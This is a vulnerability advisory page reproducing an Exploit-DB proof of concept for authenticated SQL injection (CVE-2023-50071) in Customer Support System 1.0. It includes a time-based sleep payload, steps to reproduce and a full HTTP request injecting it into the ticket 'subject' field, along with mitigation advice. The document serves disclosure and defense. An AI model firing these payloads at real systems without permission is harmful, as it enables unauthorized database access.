Customer Support System 1.0 - Multiple SQL Injection Vulnerabilities

vendor:

Customer Support System

by:

Geraldo Alcantara

7.1

CVSS

HIGH

SQL Injection

CWE

Product Name: Customer Support System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: CVE-2023-50071

CPE: a:customer_support_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows

2023

Customer Support System 1.0 – Multiple SQL Injection Vulnerabilities

Multiple SQL injection vulnerabilities were found in Customer Support System 1.0, specifically in the /customer_support/ajax.php?action=save_ticket endpoint. Authenticated attackers can exploit these vulnerabilities to execute arbitrary SQL commands by manipulating parameters like department_id, customer_id, and subject.

Mitigation:

To mitigate these vulnerabilities, sanitize user inputs to prevent SQL injection attacks. Implement parameterized queries to ensure that user inputs are treated as data, not executable code.

Source

Exploit-DB raw data:

# Exploit Title: Customer Support System 1.0 - Multiple SQL injection
vulnerabilities
# Date: 15/12/2023
# Exploit Author: Geraldo Alcantara
# Vendor Homepage:
https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link:
https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows
# CVE : CVE-2023-50071
*Description*: Multiple SQL injection vulnerabilities in
/customer_support/ajax.php?action=save_ticket in Customer Support
System 1.0 allow authenticated attackers to execute arbitrary SQL
commands via department_id, customer_id and subject.*Payload*:
'+(select*from(select(sleep(20)))a)+'
*Steps to reproduce*:

1- Log in to the application.

2- Navigate to the page /customer_support/index.php?page=new_ticket.

3- Create a new ticket and insert a malicious payload into one of the
following parameters: department_id, customer_id, or subject.
*Request:*
POST /customer_support/ajax.php?action=save_ticket HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------81419250823331111993422505835
Content-Length: 853
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/index.php?page=new_ticket
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko;
sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq;
PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l

-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="id"


-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="subject"

teste'+(select*from(select(sleep(5)))a)+'
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="customer_id"

3
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="department_id"

4
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="description"

<p>Blahs<br></p>
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------81419250823331111993422505835--